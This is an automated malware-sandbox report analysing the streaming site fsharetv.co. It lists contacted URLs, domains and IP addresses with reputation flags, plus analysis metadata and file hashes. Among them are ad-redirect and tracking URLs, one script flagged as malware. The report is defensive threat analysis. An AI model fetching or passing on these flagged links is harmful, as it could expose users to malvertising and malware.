                                        unknownfalse
                                          high
                                          cdn.jsdelivr.net
                                          unknown
                                          unknownfalse
                                            high
                                            lgzmq.employmehnt.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.youtube.com
                                              unknown
                                              unknownfalse
                                                high
                                                NameMaliciousAntivirus DetectionReputation
                                                https://m.media-amazon.com/images/M/MV5BNWE4OTNiM2ItMjY4Ni00ZTViLWFiZmEtZGEyNGY2ZmNlMzIyXkEyXkFqcGdeQXVyMDU5NDcxNw@@._V1_SX300.jpgfalse
                                                  high
                                                  https://lgzmq.employmehnt.com/UARUK?tag_id=1092278&sub_id1=&sub_id2=7644300386026765877&cookie_id=8dbdac19-33de-4295-8d02-4ac9205c776a&lp=not_robot_3&tb=redirect&allb=redirect&ob=redirect&href=https%3A%2F%2Fgetrunkhomuto.info%2F%3Ftid%3D1092278%26noocp%3D1&hop=7&geo=USfalse
                                                    unknown
                                                    https://images.fsharetv.co/jwjzcdhlaa.jpgfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://m.media-amazon.com/images/M/MV5BOGEyZjQzMWUtNzE4Zi00Y2NhLWFkYzctNGZiNTQzY2VmYjBlXkEyXkFqcGc@._V1_SX300.jpgfalse
                                                      high
                                                      https://lgzmq.employmehnt.com/block.js?b=4false
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://m.media-amazon.com/images/M/MV5BOWZkZTM2YjMtZDgxNy00ODFhLWEzOGEtZGUxZTZmZWVkMTEzXkEyXkFqcGc@._V1_SX300.jpgfalse
                                                        high
                                                        https://bineukdwithme.com/Q2xwVmNsUxMlXhQ7KSw5KD4AABQBPhQRVhsvHDJRISpIHjUbKVYiCidRQWZacV5HbkUzBRRrUmUfBDcXNh9NZVNzXlY/DSUDTWdXbVhAZ0U1UUF4UHdCQ2BNd0oFa1JlGAA3BH5dViYXNwBNZ1RwWEJgUXRcRmdRdQfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://m.media-amazon.com/images/M/MV5BNjE4NGU0MjgtMzgxYy00NzhmLWI3ZWItMTBlNGJmYmVhMGJiXkEyXkFqcGc@._V1_SX300.jpgfalse
                                                          high
                                                          https://m.media-amazon.com/images/M/MV5BNDI0MWQyMzMtOGI4Ni00NTZlLTg0NTItNzQ5Y2UwYjdiOWZmXkEyXkFqcGc@._V1_SX300.jpgfalse
                                                            high
                                                            https://bineukdwithme.com/T29ORHpgUC03RwEpFHQ3NSYLHkosKg8jNCE7Hw07Djh3BTsODGgwEytSf3RDfV15fFw/Bip5S2kcOiUOOhxzcVwmASgrR2kZc3VUfFtgd0xhW2gxR35JOjQbKFJ/Ygo7GyJ5S3hcenZMfVl3dU19Wwfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://m.media-amazon.com/images/M/MV5BNzkyYjk2MGMtNjdlYS00M2Y5LThiNmMtNDQxYTk2MTUyNmMwXkEyXkFqcGdeQXVyOTg4MDk3MTQ@._V1_SX300.jpgfalse
                                                              high
                                                              https://m.media-amazon.com/images/M/MV5BOTQ1NmFjMzEtNTkxYS00ZjY5LTgxN2UtMWM0NTlkZjc4MzNmL2ltYWdlL2ltYWdlXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpgfalse
                                                                high
                                                                https://m.media-amazon.com/images/M/MV5BMDU2ZWJlMjktMTRhMy00ZTA5LWEzNDgtYmNmZTEwZTViZWJkXkEyXkFqcGdeQXVyNDQ2OTk4MzI@._V1_SX300.jpgfalse
                                                                  high
                                                                  https://m.media-amazon.com/images/M/MV5BMDNlNDIyNGQtNWUwYy00MjZlLThmMmItZjEwMjEyM2E5OGQ5XkEyXkFqcGdeQXVyODk1MjAxNzQ@._V1_SX300.jpgfalse
                                                                    high
                                                                    https://m.media-amazon.com/images/M/MV5BY2UxYmJhNDctNGVlZi00NGJlLTkzMjItZGMzMTA2NTc2YTkyXkEyXkFqcGc@._V1_SX300.jpgfalse
                                                                      high
                                                                      https://m.media-amazon.com/images/M/MV5BNWYxZjE3MGQtZWZmMC00NTFjLTlkZmUtODFkZDY1MGYyZWQ4XkEyXkFqcGdeQXVyNjM2NTM3ODA@._V1_SX300.jpgfalse
                                                                        high
                                                                        https://m.media-amazon.com/images/M/MV5BMTU1MzM0MjcxMF5BMl5BanBnXkFtZTgwODQ0MzcxMTE@._V1_SX300.jpgfalse
                                                                          high
                                                                          https://m.media-amazon.com/images/M/MV5BMTc2MTY4NTM2NV5BMl5BanBnXkFtZTcwNzEyMzkxMQ@@._V1_SX300.jpgfalse
                                                                            high
                                                                            https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.cssfalse
                                                                              high
                                                                              https://a.nel.cloudflare.com/report/v4?s=J%2BfTEyXCZr2lOhfmsOa81sbl01xyWqPm8jMCnozW8rp8mR1Ziu3SpaLYBIwaI1U1ffkcFEYNBbZE1s5DZV2DNH4WAB7A6cAGI8hgDKuWnjUc4ut8Uw33%2F3ecXi7oXQ%3D%3Dfalse
                                                                                high
                                                                                https://fsharetv.co/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.jsfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://bineukdwithme.com/U1VLT0N8aig8fgECPxsZFBN4Gi4ZMR18CTAMJwkSNzl+PhUFAG07Kjdoen96YG1yd2UjPC9ycmtzODsiJyA4cnJ1PCUpLG5zPXJyfWVlfW1mcz5ycnUhOy4kbmRtPzcnOXZ+dGBheXlxZWJ8fHpmfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://cdn.jsdelivr.net/npm/sweetalert2@11false
                                                                                  high
                                                                                  https://m.media-amazon.com/images/M/MV5BYjliZjQ1NGMtNjU1MS00M2RmLThkN2UtM2NlNTJjM2FjYTk1XkEyXkFqcGdeQXVyMjgyNjk3MzE@._V1_SX300.jpgfalse
                                                                                    high
                                                                                    https://m.media-amazon.com/images/M/MV5BM2FkM2U5MjYtMjkzNy00MDlkLWFiNzItOGJjZjQxMGViNjI3XkEyXkFqcGc@._V1_SX300.jpgfalse
                                                                                      high
                                                                                      https://m.media-amazon.com/images/M/MV5BODk0NjBmZTYtMTBmMi00MDkzLTg2ZjYtMDVkOWY1NjYxMWY0XkEyXkFqcGdeQXVyMTY5Nzc4MDY@._V1_SX300.jpgfalse
                                                                                        high
                                                                                        https://birthjeans.icu/templates/assets/s1/fontawesome.css?false
                                                                                          high
                                                                                          https://m.media-amazon.com/images/M/MV5BZDBkM2I3OTQtNmI3MC00ZjI1LTk3NzQtYzcwMWE2NTBjMGNiXkEyXkFqcGdeQXVyNDE5MTU2MDE@._V1_SX300.jpgfalse
                                                                                            high
                                                                                            https://bineukdwithme.com/WmFKYlZ1XikRazg0DxUFHAkuARcURHgkNxwRPSEONhAdKjEfBHhScC4ILl9nalh4UGFiRzoLMmdQbBEiOxU/EWtpRyMMMDVcJw0jKQQuDSE0RzxfZ3RSfkxlbE9+RCNnUGwWJjsGd1NwKhU+DmtrVnlWZGxTfFpuYldzfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://m.media-amazon.com/images/M/MV5BMGVhYmRlMjEtMTZhYy00ZTgyLWI5YzMtMTFmMzg2OWEwZWRhXkEyXkFqcGc@._V1_SX300.jpgfalse
                                                                                              high
                                                                                              https://m.media-amazon.com/images/M/MV5BOGY0YTQ3M2UtZjA5MS00NDg3LTgwYzktM2FhNjhlYTRmNGZiXkEyXkFqcGc@._V1_SX300.jpgfalse
                                                                                                high
                                                                                                https://m.media-amazon.com/images/M/MV5BYmIxYzM5NGItMzQwMC00MDAzLThiZTItNDQxZWZlZmIwYTRkXkEyXkFqcGc@._V1_SX300.jpgfalse
                                                                                                  high
                                                                                                  https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0false
                                                                                                    high
                                                                                                    https://m.media-amazon.com/images/M/MV5BMDIzODcyY2EtMmY2MC00ZWVlLTgwMzAtMjQwOWUyNmJjNTYyXkEyXkFqcGdeQXVyNDk3NzU2MTQ@._V1_SX300.jpgfalse
                                                                                                      high
                                                                                                      https://m.media-amazon.com/images/M/MV5BMGJhOTk0NjEtYzcxNi00ZjQwLWE0ZDItMGZhMGYzMTRlMWZhXkEyXkFqcGc@._V1_SX300.jpgfalse
                                                                                                        high
                                                                                                        https://m.media-amazon.com/images/M/MV5BZWFjNGI2ODgtMTFmNi00NDU5LWIwNjEtZThmNjk0OTNlNWFiXkEyXkFqcGdeQXVyNjMwMjk0MTQ@._V1_SX300.jpgfalse
                                                                                                          high
                                                                                                          https://m.media-amazon.com/images/M/MV5BMjM3OTJiYTktNjNjMS00Yjc3LWE3ODktZjIxMDk1NzU1ZTQ3XkEyXkFqcGdeQXVyODU4MzMxNDg@._V1_SX300.jpgfalse
                                                                                                            high
                                                                                                            https://m.media-amazon.com/images/M/MV5BZGEyNDljMjQtZGI0Ni00ZWM0LWI5NjktMjNiMmI1YmZiOTIxXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpgfalse
                                                                                                              high
                                                                                                              https://m.media-amazon.com/images/M/MV5BMTU4Mzk3ODIyOF5BMl5BanBnXkFtZTgwODgyNzk2NjE@._V1_SX300.jpgfalse
                                                                                                                high
                                                                                                                https://images.fsharetv.co/ysyyscafvj.jpgfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://birthjeans.icu/templates/assets/s1/style.cssfalse
                                                                                                                  high
                                                                                                                  https://arketingefifortw.com/MnB6NXdTEhlYSFNNGBMCQBxHEEV0VUhzEwAHQ1YTR0hOTRQGFQsbFF4fD1ERQB8UQVlcFQ4QRXQcN30bBiQ+WSN0GCNENVkhK30/dzk7cDV5Fh0BPmoHHRBFcCg8bzJ6GkNnImMDHnoyChU9XRNDJUp4IHQaDXATWjUNejJzNilnQhdCPHY/VVVIdz5zFxxnNn8TGWcmdCgCZANkQR5wL1scImBHYDobWR9nN0pjQ3pAK38xSxM/Yg9BJzFwD2Y2K3wQZxgjeDBqNi9tAH8iM3MhYCg/Wjx2Mk9/L2pEMHI2BiIzWUZUNB1BB3EHO20zdRs2dDJaOSNSHGQjEBgHQjMNdDh3IzNlNXQINnEfRTMpZDUENChZFGEeAmwmcxsvfiIHJj1NOl4kKGM7Yh4RfjUDFDZQH0UzKWM2XCUvZCJ0NxF5FAMIMVMxZCo/XUZCMw10EnojQ2YvAzIeUxBeJD9kGFgmPGMUYRcVfDZnRS1TNVExLAUfQjMNdDx1IwpsJloyHlMZCjYpXk5bMx1vEXYoP3xRWAMVWwcPNhJ9A0tFSlNEAzg9bTMfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                  https://stats.g.doubleclick.net/g/collectchromecache_345.1.dr, chromecache_325.1.drfalse
                                                                                                                    high
                                                                                                                    https://images.fsharetv.co/ibemluawsg.jpgchromecache_268.1.drfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://images.fsharetv.co/myhjkmlzkv.jpgchromecache_268.1.drfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://images.fsharetv.co/wxbjvkqyvr.jpgchromecache_268.1.drfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://m.media-amazon.com/images/M/MV5BNmVmYzcwNzMtMWM1NS00MWIyLThlMDEtYzUwZDgzODE1NmE2XkEyXkFqcGdechromecache_268.1.drfalse
                                                                                                                      high
                                                                                                                      https://m.media-amazon.com/images/M/MV5BOWFmMWM3YWQtM2M2NC00ZmRkLTg4MTEtNjRiNDQ2NDk2MWJkXkEyXkFqcGcchromecache_268.1.drfalse
                                                                                                                        high
                                                                                                                        https://images.fsharetv.co/dupfykwpkr.jpgchromecache_268.1.drfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://m.media-amazon.com/images/M/MV5BMGRlOWYyZjItMzMwZS00ZTA5LTliYWUtZWQxZTllOTQ1Y2VlL2ltYWdlL2ltchromecache_268.1.drfalse
                                                                                                                          high
                                                                                                                          https://images.fsharetv.co/hlpzqetjdc.jpgchromecache_268.1.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://ampcid.google.com/v1/publisher:getClientIdchromecache_288.1.dr, chromecache_327.1.drfalse
                                                                                                                            high
                                                                                                                            https://jsc.adskeeper.co.uk/f/s/fsharetv.co.975583.jschromecache_268.1.drfalse
                                                                                                                              high
                                                                                                                              https://ad-maven.com/publisher-terms-of-service/chromecache_295.1.dr, chromecache_321.1.drfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://www.youtube.comchromecache_337.1.drfalse
                                                                                                                                high
                                                                                                                                https://m.media-amazon.com/images/M/MV5BOWZkZTM2YjMtZDgxNy00ODFhLWEzOGEtZGUxZTZmZWVkMTEzXkEyXkFqcGcchromecache_268.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://fontawesome.comchromecache_198.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://m.media-amazon.com/images/M/MV5BZDBkM2I3OTQtNmI3MC00ZjI1LTk3NzQtYzcwMWE2NTBjMGNiXkEyXkFqcGdechromecache_268.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://m.media-amazon.com/images/M/MV5BMjIxOTIyNjE4OF5BMl5BanBnXkFtZTgwMDc5NTY2MDEchromecache_268.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://feenotifyfriends.info/media/manage/images/logo-square.png?b=7chromecache_295.1.dr, chromecache_321.1.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://images.fsharetv.co/mzqsdvvvgn.jpgchromecache_268.1.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://m.media-amazon.com/images/M/MV5BMjAzNzgzNDg5Nl5BMl5BanBnXkFtZTcwODYwNTIyMQchromecache_268.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://m.media-amazon.com/images/M/MV5BYTk4YjhmNGMtOTZkYi00MjNmLThmZGItMGYyNDljNTdhNDA1XkEyXkFqcGdechromecache_268.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://stats.g.doubleclick.net/j/collectchromecache_327.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://m.media-amazon.com/images/M/MV5BMjZmOTU5ODAtZTZkMi00ODZkLTgxNGEtZTViYzFmNzAxYTU4XkEyXkFqcGcchromecache_268.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://m.media-amazon.com/images/M/MV5BMDU2ZWJlMjktMTRhMy00ZTA5LWEzNDgtYmNmZTEwZTViZWJkXkEyXkFqcGdechromecache_268.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://m.media-amazon.com/images/M/MV5BMTc2MTY4NTM2NV5BMl5BanBnXkFtZTcwNzEyMzkxMQchromecache_268.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://images.fsharetv.co/kwwlpoxmkw.jpgchromecache_268.1.drfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://m.media-amazon.com/images/M/MV5BYmIxYzM5NGItMzQwMC00MDAzLThiZTItNDQxZWZlZmIwYTRkXkEyXkFqcGcchromecache_268.1.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://images.fsharetv.co/lsznwkzkeg.jpgchromecache_268.1.drfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://images.fsharetv.co/ntccrcrfbq.jpgchromecache_268.1.drfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://m.media-amazon.com/images/M/MV5BODE3YWNkZGQtZGZjNy00NDZlLWI1MzAtZWUzYTgwM2NiZjA2XkEyXkFqcGcchromecache_268.1.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://m.media-amazon.com/images/M/MV5BOGY0YTQ3M2UtZjA5MS00NDg3LTgwYzktM2FhNjhlYTRmNGZiXkEyXkFqcGcchromecache_268.1.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://images.fsharetv.co/mhbmmtnqkc.jpgchromecache_268.1.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://images.fsharetv.co/xzgbqwqnzf.jpgchromecache_268.1.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://m.media-amazon.com/images/M/MV5BY2IzZGY2YmEtYzljNS00NTM5LTgwMzUtMzM1NjQ4NGI0OTk0XkEyXkFqcGdechromecache_268.1.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://github.com/devbridge/jQuery-Autocompletechromecache_199.1.dr, chromecache_406.1.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://images.fsharetv.co/vefympkwgl.jpgchromecache_268.1.drfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://m.media-amazon.com/images/M/MV5BMmRkMTVlNTEtOWQxNC00OGY4LWIzMzQtMjY2MTZjNDU2N2ViXkEyXkFqcGdechromecache_268.1.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://m.media-amazon.com/images/M/MV5BZWQ3NWI5NDYtMGNiZS00MTNhLTk4ODItNWM2NTcyNjFiMTljL2ltYWdlXkEychromecache_268.1.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://m.media-amazon.com/images/M/MV5BZDFlMjEyM2QtMGQ1NS00NWYzLTllMTItZTVmODcxZDY3ZDMzXkEyXkFqcGcchromecache_268.1.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://images.fsharetv.co/nypxzfnccp.jpgchromecache_268.1.drfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://m.media-amazon.com/images/M/MV5BODUyM2Y1MzgtZDIwNy00YzRjLTkyMGQtYzZiODI5MWEwZDdkXkEyXkFqcGdechromecache_268.1.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://images.fsharetv.co/qxdsikxvmh.jpgchromecache_268.1.drfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://m.media-amazon.com/images/M/MV5BOGEyZjQzMWUtNzE4Zi00Y2NhLWFkYzctNGZiNTQzY2VmYjBlXkEyXkFqcGcchromecache_268.1.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://m.media-amazon.com/images/M/MV5BYTk3OWJmZWUtYmZmZi00YmI5LWE4ZWQtODE0YjI0Mzk4MDkxL2ltYWdlXkEychromecache_268.1.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://gdplayer.vipchromecache_268.1.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_332.1.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://images.fsharetv.co/jxyborotiz.jpgchromecache_268.1.drfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://m.media-amazon.com/images/M/MV5BMDM2ZGY5MDQtZTUyMS00ZTgzLTk4YWMtMWM2YjE2NWQ1Yjk3XkEyXkFqcGdechromecache_268.1.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://m.media-amazon.com/images/M/MV5BNWIwODRlZTUtY2U3ZS00Yzg1LWJhNzYtMmZiYmEyNmU1NjMzXkEyXkFqcGdechromecache_268.1.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://m.media-amazon.com/images/M/MV5BZGViYTNjMTktMTQ3OS00NWNkLTk2Y2MtMGQ4M2JjZTUwOGRlXkEyXkFqcGcchromecache_268.1.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://m.media-amazon.com/images/M/MV5BYjliZjQ1NGMtNjU1MS00M2RmLThkN2UtM2NlNTJjM2FjYTk1XkEyXkFqcGdechromecache_268.1.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://m.media-amazon.com/images/M/MV5BMTY4MTkxOTk1Nl5BMl5BanBnXkFtZTgwNjAyODgwMzEchromecache_268.1.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://images.fsharetv.co/sbpyzixmgg.jpgchromecache_268.1.drfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://images.fsharetv.co/qqtsmisech.jpgchromecache_268.1.drfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://images.fsharetv.co/nrythsbhxb.jpgchromecache_268.1.drfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://developers.google.com/youtube/iframe_api_reference#Eventschromecache_378.1.dr, chromecache_337.1.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://images.fsharetv.co/ctuuyqjswl.jpgchromecache_268.1.drfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://fontawesome.com/licensechromecache_198.1.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                          104.21.48.1
                                                                                                                                                                                          ukankingwithea.comUnited States
                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                          172.67.161.217
                                                                                                                                                                                          birthjeans.icuUnited States
                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                          151.101.193.16
                                                                                                                                                                                          media.amazon.map.fastly.netUnited States
                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                          151.101.193.229
                                                                                                                                                                                          jsdelivr.map.fastly.netUnited States
                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                          104.21.83.249
                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                          108.158.75.43
                                                                                                                                                                                          getrunkhomuto.infoUnited States
                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                          151.101.65.16
                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                          172.67.183.159
                                                                                                                                                                                          bineukdwithme.comUnited States
                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                          35.190.80.1
                                                                                                                                                                                          a.nel.cloudflare.comUnited States
                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                          13.227.8.77
                                                                                                                                                                                          arketingefifortw.comUnited States
                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                          157.240.195.35
                                                                                                                                                                                          star-mini.c10r.facebook.comUnited States
                                                                                                                                                                                          32934FACEBOOKUSfalse
                                                                                                                                                                                          104.17.24.14
                                                                                                                                                                                          cdnjs.cloudflare.comUnited States
                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                          18.165.220.113
                                                                                                                                                                                          ghabovethec.infoUnited States
                                                                                                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                                                                                                          108.158.71.105
                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                          104.21.10.158
                                                                                                                                                                                          fsharetv.coUnited States
                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                          142.250.181.100
                                                                                                                                                                                          www.google.comUnited States
                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                          172.67.131.140
                                                                                                                                                                                          images.fsharetv.coUnited States
                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                          54.225.185.110
                                                                                                                                                                                          kenwellsgrpo.comUnited States
                                                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                                                          13.227.8.8
                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                          unknownReserved
                                                                                                                                                                                          unknownunknownfalse
                                                                                                                                                                                          18.202.12.61
                                                                                                                                                                                          nostop.go2cloud.orgUnited States
                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                          142.250.181.78
                                                                                                                                                                                          youtube-ui.l.google.comUnited States
                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                          52.210.2.133
                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                          108.158.71.140
                                                                                                                                                                                          d2w9cdu84xc4eq.cloudfront.netUnited States
                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                          108.158.75.125
                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                          104.17.25.14
                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                          IP
                                                                                                                                                                                          192.168.2.16
                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                          Analysis ID:1575386
                                                                                                                                                                                          Start date and time:2024-12-15 12:37:12 +01:00
                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                          Overall analysis duration:0h 4m 13s
                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                          Report type:full
                                                                                                                                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                          Sample URL:https://fsharetv.co/
                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                          Number of analysed new started processes analysed:13
                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                          Technologies:
                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                          Classification:mal52.win@30/342@68/27
                                                                                                                                                                                          EGA Information:Failed
                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.19.206, 64.233.164.84, 172.217.17.46, 199.232.214.172, 172.217.17.42, 142.250.181.138, 142.250.181.10, 172.217.19.170, 216.58.208.234, 142.250.181.74, 172.217.17.74, 142.250.181.106, 172.217.19.10, 172.217.19.202, 172.217.19.234, 142.250.181.104, 216.58.208.232, 64.233.163.84, 142.250.181.14, 142.250.181.67, 172.217.17.35, 142.250.181.3, 23.218.208.109, 4.175.87.197
                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ajax.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, a.media-amazon.com.akamaized.net, www.googletagmanager.com, update.googleapis.com, clients.l.google.com, www.gstatic.com, www.google-analytics.com
                                                                                                                                                                                          • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                          No simulations
                                                                                                                                                                                          No context
                                                                                                                                                                                          No context
                                                                                                                                                                                          No context
                                                                                                                                                                                          No context
                                                                                                                                                                                          No context
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Dec 15 10:37:48 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2673
                                                                                                                                                                                          Entropy (8bit):3.98177203571541
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:8jOdKTcL22HwidAKZdA1FehwiZUklqehry+3:8bX9ky
                                                                                                                                                                                          MD5:DC1104FA3011D983AAD4F5A22791939B
